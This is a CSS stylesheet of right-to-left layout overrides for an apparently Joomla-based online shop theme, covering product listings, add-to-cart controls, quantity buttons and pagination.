body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  padding: 5px 15px;
  display: block;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div:hover {
  background: #f0f0f0;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer:hover .orderlist {
  opacity: 1;
  display: block;
  visibility: visible;
  margin-top: 1px;
}
body.rtl .orderby-displaynumber .display-number {
  margin: 0;
  padding: 5px;
  text-align: right;
  font-size: 14px;
  float: left;
}
body.rtl .orderby-displaynumber .display-number >span:first-child {
  margin: 0 10px 0 0;
  text-align: right;
  line-height: 2;
  display: inline;
  clear: left;
  float: right;
}
body.rtl .orderby-displaynumber .display-number select {
  max-width: 60px;
  text-align: right;
}
body.rtl .orderby-displaynumber .display-number .chzn-container-single,
body.rtl .orderby-displaynumber .display-number .chzn-single {
  max-width: 60px;
  text-align: right;
  display: block;
  margin: -3px 0 0;
}
body.rtl .orderby-displaynumber .display-number .chzn-single span {
  margin-left: 0;
  margin-right: 8px;
  text-align: right;
}
body.rtl .orderby-displaynumber .display-number .chzn-single div {
  left: 8px;
  right: auto;
}
body.rtl #fancybox-close {
  left: -15px;
  right: auto;
}
body.rtl .sppb-text-center {
  text-align: center !important;
}
body.rtl .sppb-addon.sppb-text-left {
  text-align: left;
}
body.rtl .sppb-addon.sppb-text-left h3.sppb-addon-title {
  direction: ltr;
  padding-left: 0;
  padding-right: 3%;
  text-align: left;
}
body.rtl .sppb-addon.sppb-text-left h3.sppb-addon-title:after {
  clear: both;
  display: block;
  float: left;
  content: " ";
  position: relative;
  height: 2px;
  width: 70%;
  margin: 10px 30% 0 0;
  border-radius: 2px;
  padding: 0;
}
body.rtl .sppb-addon.sppb-text-left h1,
body.rtl .sppb-addon.sppb-text-left h2,
body.rtl .sppb-addon.sppb-text-left h3,
body.rtl .sppb-addon.sppb-text-left h4,
body.rtl .sppb-addon.sppb-text-left h4,
body.rtl .sppb-addon.sppb-text-left h6 {
  text-align: left;
}
body.rtl .sppb-addon.sppb-text-center {
  text-align: center !important;
}
body.rtl .sppb-addon.sppb-text-center h3.sppb-addon-title {
  width: auto;
  direction: rtl;
  padding-right: 0;
  padding-left: 3%;
  text-align: center;
}
body.rtl .sppb-addon.sppb-text-center h3.sppb-addon-title:after {
  clear: both;
  display: block;
  float: right;
  content: " ";
  height: 2px;
  width: 70%;
  margin: 10px 0 0 30%;
  padding: 0;
}
body.rtl .sppb-addon.sppb-text-center h1,
body.rtl .sppb-addon.sppb-text-center h2,
body.rtl .sppb-addon.sppb-text-center h3,
body.rtl .sppb-addon.sppb-text-center h4,
body.rtl .sppb-addon.sppb-text-center h4,
body.rtl .sppb-addon.sppb-text-center h6 {
  text-align: center;
}
body.rtl .sppb-addon.sppb-text-right {
  text-align: right;
}
body.rtl .sppb-addon.sppb-text-right h3.sppb-addon-title {
  text-align: right;
  direction: rtl;
}
body.rtl .sppb-addon.sppb-text-right h3.sppb-addon-title:before {
  clear: both;
  display: block;
  float: left;
  content: "*";
  visibility: hidden;
  opacity: 0;
  width: 100%;
  margin: 10px 0 0 0;
}
body.rtl .sppb-addon.sppb-text-right h3.sppb-addon-title:after {
  float: right;
  width: 70%;
  margin: 10px 0 0 30%;
}
body.rtl .sppb-addon.sppb-text-right h1,
body.rtl .sppb-addon.sppb-text-right h2,
body.rtl .sppb-addon.sppb-text-right h3,
body.rtl .sppb-addon.sppb-text-right h4,
body.rtl .sppb-addon.sppb-text-right h4,
body.rtl .sppb-addon.sppb-text-right h6 {
  text-align: right;
}
body.rtl .category-view h4,
body.rtl .browse-view h4,
body.rtl .latest-view h4,
body.rtl .recent-view h4,
body.rtl .featured-view h4,
body.rtl .topten-view h4 {
  float: right;
  line-height: 1.5;
  display: table;
  margin: 35px 0 30px;
  font-size: 160%;
  padding-left: 5%;
  padding-right: 0;
  box-shadow: inset 0 -1px 0 rgba(90,90,90,0.15);
}
body.rtl .category-view h4 .divider,
body.rtl .browse-view h4 .divider,
body.rtl .latest-view h4 .divider,
body.rtl .recent-view h4 .divider,
body.rtl .featured-view h4 .divider,
body.rtl .topten-view h4 .divider {
  clear: both;
  float: right;
  height: 10px;
  width: 75%;
}
body.rtl .category-view .row.productwrap .product,
body.rtl .category-view .row.productwrap .products,
body.rtl .browse-view .row.productwrap .product,
body.rtl .browse-view .row.productwrap .products,
body.rtl .latest-view .row.productwrap .product,
body.rtl .latest-view .row.productwrap .products,
body.rtl .recent-view .row.productwrap .product,
body.rtl .recent-view .row.productwrap .products,
body.rtl .featured-view .row.productwrap .product,
body.rtl .featured-view .row.productwrap .products,
body.rtl .topten-view .row.productwrap .product,
body.rtl .topten-view .row.productwrap .products {
  border: none;
  margin: 0 0 20px -1px;
}
body.rtl .category-view .row .spacer .spacer-inner,
body.rtl .browse-view .row .spacer .spacer-inner,
body.rtl .latest-view .row .spacer .spacer-inner,
body.rtl .recent-view .row .spacer .spacer-inner,
body.rtl .featured-view .row .spacer .spacer-inner,
body.rtl .topten-view .row .spacer .spacer-inner {
  text-align: center;
  padding: 20px;
}
body.rtl .category-view .row .spacer .spacer-inner h2,
body.rtl .browse-view .row .spacer .spacer-inner h2,
body.rtl .latest-view .row .spacer .spacer-inner h2,
body.rtl .recent-view .row .spacer .spacer-inner h2,
body.rtl .featured-view .row .spacer .spacer-inner h2,
body.rtl .topten-view .row .spacer .spacer-inner h2 {
  margin: 5px auto;
  font-size: 120%;
  line-height: 1.5;
  display: block;
  width: 100%;
}
body.rtl .category-view .row .spacer .spacer-inner h2 a,
body.rtl .browse-view .row .spacer .spacer-inner h2 a,
body.rtl .latest-view .row .spacer .spacer-inner h2 a,
body.rtl .recent-view .row .spacer .spacer-inner h2 a,
body.rtl .featured-view .row .spacer .spacer-inner h2 a,
body.rtl .topten-view .row .spacer .spacer-inner h2 a {
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
body.rtl .category-view .row .spacer .spacer-inner .product_s_desc,
body.rtl .browse-view .row .spacer .spacer-inner .product_s_desc,
body.rtl .latest-view .row .spacer .spacer-inner .product_s_desc,
body.rtl .recent-view .row .spacer .spacer-inner .product_s_desc,
body.rtl .featured-view .row .spacer .spacer-inner .product_s_desc,
body.rtl .topten-view .row .spacer .spacer-inner .product_s_desc {
  margin: 0 auto;
}
body.rtl .category-view .row .spacer .spacer-inner .product_s_desc hr,
body.rtl .browse-view .row .spacer .spacer-inner .product_s_desc hr,
body.rtl .latest-view .row .spacer .spacer-inner .product_s_desc hr,
body.rtl .recent-view .row .spacer .spacer-inner .product_s_desc hr,
body.rtl .featured-view .row .spacer .spacer-inner .product_s_desc hr,
body.rtl .topten-view .row .spacer .spacer-inner .product_s_desc hr {
  margin: 20px auto;
  width: 100%;
  clear: both;
}
body.rtl .category-view .row .spacer .spacer-inner .product-price,
body.rtl .browse-view .row .spacer .spacer-inner .product-price,
body.rtl .latest-view .row .spacer .spacer-inner .product-price,
body.rtl .recent-view .row .spacer .spacer-inner .product-price,
body.rtl .featured-view .row .spacer .spacer-inner .product-price,
body.rtl .topten-view .row .spacer .spacer-inner .product-price {
  margin: 10px auto;
  padding: 0;
  text-align: center;
  display: block;
  height: 35px;
  line-height: 35px;
  width: 100%;
}
body.rtl .category-view .row .spacer .spacer-inner .product-price *,
body.rtl .category-view .row .spacer .spacer-inner .product-price .vm-price-desc,
body.rtl .browse-view .row .spacer .spacer-inner .product-price *,
body.rtl .browse-view .row .spacer .spacer-inner .product-price .vm-price-desc,
body.rtl .latest-view .row .spacer .spacer-inner .product-price *,
body.rtl .latest-view .row .spacer .spacer-inner .product-price .vm-price-desc,
body.rtl .recent-view .row .spacer .spacer-inner .product-price *,
body.rtl .recent-view .row .spacer .spacer-inner .product-price .vm-price-desc,
body.rtl .featured-view .row .spacer .spacer-inner .product-price *,
body.rtl .featured-view .row .spacer .spacer-inner .product-price .vm-price-desc,
body.rtl .topten-view .row .spacer .spacer-inner .product-price *,
body.rtl .topten-view .row .spacer .spacer-inner .product-price .vm-price-desc {
  display: none;
}
body.rtl .category-view .row .spacer .spacer-inner .product-price .PricesalesPrice,
body.rtl .browse-view .row .spacer .spacer-inner .product-price .PricesalesPrice,
body.rtl .latest-view .row .spacer .spacer-inner .product-price .PricesalesPrice,
body.rtl .recent-view .row .spacer .spacer-inner .product-price .PricesalesPrice,
body.rtl .featured-view .row .spacer .spacer-inner .product-price .PricesalesPrice,
body.rtl .topten-view .row .spacer .spacer-inner .product-price .PricesalesPrice {
  font-size: 26px;
  display: block;
}
body.rtl .category-view .row .spacer .addtocart-bar,
body.rtl .browse-view .row .spacer .addtocart-bar,
body.rtl .latest-view .row .spacer .addtocart-bar,
body.rtl .recent-view .row .spacer .addtocart-bar,
body.rtl .featured-view .row .spacer .addtocart-bar,
body.rtl .topten-view .row .spacer .addtocart-bar {
  padding: 0;
  margin: 25px auto 0;
  width: 100%;
  display: block;
}
body.rtl .category-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .browse-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .latest-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .recent-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .featured-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .topten-view .row .spacer .addtocart-bar .cd-customization {
  width: 66%;
  width: calc(61%);
  float: left;
}
body.rtl .category-view .row .spacer .addtocart-bar .cd-customization button,
body.rtl .browse-view .row .spacer .addtocart-bar .cd-customization button,
body.rtl .latest-view .row .spacer .addtocart-bar .cd-customization button,
body.rtl .recent-view .row .spacer .addtocart-bar .cd-customization button,
body.rtl .featured-view .row .spacer .addtocart-bar .cd-customization button,
body.rtl .topten-view .row .spacer .addtocart-bar .cd-customization button {
  width: 100%;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate {
  width: 29%;
  display: inline-table;
  float: left;
  margin: 4px 10px 0 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate >label.quantity_box {
  display: none;
  text-indent: -9999em;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate span.quantity-box input {
  padding: 0;
  border-radius: 3px;
  border: 0;
  box-shadow: none;
  background: rgba(0,0,0,0.05);
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls {
  background-image: none;
  margin: 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  display: block;
  position: absolute;
  z-index: 2;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  margin: -16px 0 0 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa {
  color: #999;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  margin: 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa {
  color: #999;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa {
  position: absolute;
  z-index: 1;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up {
  margin: -13px 0 0 -3px;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down {
  margin: 0 0 0 -3px;
}
body.rtl .category-view .row .spacer:hover img,
body.rtl .browse-view .row .spacer:hover img,
body.rtl .latest-view .row .spacer:hover img,
body.rtl .recent-view .row .spacer:hover img,
body.rtl .featured-view .row .spacer:hover img,
body.rtl .topten-view .row .spacer:hover img {
  transform: scale(1.1);
}
body.rtl .category-view .row .spacer .addtocart-bar,
body.rtl .browse-view .row .spacer .addtocart-bar,
body.rtl .latest-view .row .spacer .addtocart-bar,
body.rtl .recent-view .row .spacer .addtocart-bar,
body.rtl .featured-view .row .spacer .addtocart-bar,
body.rtl .topten-view .row .spacer .addtocart-bar {
  padding: 0;
  margin: 25px auto 0;
  width: 100%;
  display: block;
}
body.rtl .category-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .browse-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .latest-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .recent-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .featured-view .row .spacer .addtocart-bar .cd-customization,
body.rtl .topten-view .row .spacer .addtocart-bar .cd-customization {
  width: 65%;
  width: calc(60%);
  float: right;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate {
  width: 33%;
  display: inline-block;
  float: right;
  margin: 4px 0 0 8px;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-box,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-box,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-box,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-box,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-box,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-box {
  float: right;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-box input,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-box input,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-box input,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-box input,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-box input,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-box input {
  width: 32px;
  height: 32px;
  display: inline;
  text-align: center;
  border-radius: 3px !important;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls {
  top: 16px;
  right: -1px;
  float: right;
  display: inline-block;
  width: 24px;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  display: block;
  position: relative;
  float: left;
  z-index: 2;
  background-image: none;
  background: transparent;
  box-shadow: none;
  border: none;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  width: 20px;
  height: 16px;
  margin: -16px 0 0 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  margin: 0 0 0 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa {
  position: absolute;
  z-index: 1;
  float: right;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up {
  margin: 1px -4px 0 0;
}
body.rtl .category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
body.rtl .topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down {
  margin: 18px 6px 0 0;
}
body.rtl .category-view .row .spacer .spacer-inner,
body.rtl .browse-view .row .spacer .spacer-inner,
body.rtl .latest-view .row .spacer .spacer-inner,
body.rtl .recent-view .row .spacer .spacer-inner,
body.rtl .featured-view .row .spacer .spacer-inner,
body.rtl .topten-view .row .spacer .spacer-inner {
  padding: 20px 20px 1px;
}
body.rtl .category-view .row .ratingbox,
body.rtl .browse-view .row .ratingbox,
body.rtl .latest-view .row .ratingbox,
body.rtl .recent-view .row .ratingbox,
body.rtl .featured-view .row .ratingbox,
body.rtl .topten-view .row .ratingbox {
  background-size: 13px;
  max-width: 65px !important;
}
body.rtl .category-view .row .vm-details-button,
body.rtl .browse-view .row .vm-details-button,
body.rtl .latest-view .row .vm-details-button,
body.rtl .recent-view .row .vm-details-button,
body.rtl .featured-view .row .vm-details-button,
body.rtl .topten-view .row .vm-details-button {
  display: none;
}
body.rtl .spacer .spacer-img span.overlay {
  width: calc(93.03%) !important;
  text-align: center;
  height: auto;
  bottom: 0;
  box-shadow: inset -1px 0 0px rgba(128,128,128,0.1) !important;
  padding: 20px 20px 19px;
  margin: 0 14px 1px 0;
}
body.rtl .spacer .spacer-img span.overlay >h3 {
  color: #555;
  padding: 0;
  margin: 0 auto;
}
body.rtl .vmgroup .addtocart-area {
  display: block;
  clear: both;
  width: 100%;
  margin: 0 0 0;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar {
  padding: 0;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .cd-customization .add-to-cart {
  display: block;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate {
  width: 50px;
  float: right;
  margin: 4px 0 0 5px;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-box input {
  width: 28px;
  height: 28px;
  display: inline;
  text-align: center;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls {
  top: 12px;
  right: 0px;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  display: inline;
  position: relative;
  float: left;
  z-index: 2;
  background-image: none;
  background: transparent;
  box-shadow: none;
  border: none;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  width: 20px;
  height: 16px;
  margin: -16px 0 0 0;
  background-image: none;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  margin: 0 0 0 0;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa {
  position: absolute;
  z-index: 1;
  float: left;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up {
  margin: 1px 4px 0 0;
}
body.rtl .vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down {
  margin: 16px 4px 0 0;
}
body.rtl .vmgroup .default-style .addtocart-area .addtocart-bar {
  width: 160px;
  margin: 0 auto;
  display: block;
  text-align: center;
  font-size: 105%;
}
body.rtl .vmgroup .default-style .addtocart-area .addtocart-bar button.add-to-cart {
  height: 52px;
  width: 104px;
  display: block;
}
body.rtl .vmgroup .default-style .addtocart-area .addtocart-bar button.add-to-cart >input {
  line-height: 32px;
  width: 100%;
}
body.rtl .product-neighbours a.previous-page {
  float: right;
}
body.rtl .product-neighbours a.previous-page:before {
  content: "\f105" !important;
  border-radius: 0 4px 4px 0 !important;
}
body.rtl .product-neighbours a.next-page {
  float: left;
}
body.rtl .product-neighbours a.next-page:after {
  content: "\f104" !important;
  border-radius: 4px 0 0 4px !important;
}
body.rtl .product-neighbours .empty-previous-page {
  border-radius: 0 4px 4px 0 !important;
  float: right;
}
body.rtl .product-neighbours .empty-next-page {
  border-radius: 4px 0 0 4px !important;
  float: left;
}
body.rtl .cd-pagination li {
  float: right;
  border-right: none;
  border-left: 1px solid #e6e6e6;
}
body.rtl .cd-pagination li:first-of-type a {
  border-radius: 0 0.25em 0.25em 0;
}
body.rtl .cd-pagination li:last-of-type {
  border-left: none;
}
body.rtl .cd-pagination li:last-of-type a {
  border-radius: 0.25em 0 0 0.25em;
}
body.rtl .cd-pagination .btn-previous a:before {
  content: "\e607";
  font-family: 'ap-arrows';
}
body.rtl .cd-pagination .btn-next:last-of-type a:after {
  content: "\e606";
  font-family: 'ap-arrows';
}
body.rtl ul.site-list li i {
  margin-right: 0;
  margin-left: 10px;
}
body.rtl .bullets .li-circle {
  list-style: disc;
  padding-right: 20px;
  padding-left: 0;
}
body.rtl .dropcaps .naked-drop span {
  padding: 0 0 0 20px;
  float: right;
}
body.rtl .dropcaps .full-drop span {
  float: right;
  margin: 5px 0 5px 15px;
}
body.rtl .sppb-addon-cta .sppb-btn {
  float: left;
  left: 0;
  right: auto;
}
body.rtl .sppb-addon-cta .text-center .sppb-btn {
  float: none;
  left: auto;
  right: auto;
}
body.rtl .sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  width: 44px;
  float: right;
  margin-left: -3px;
  margin-right: -10px;
}
body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li,
body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li .simple-divider {
  float: right;
  direction: rtl;
}
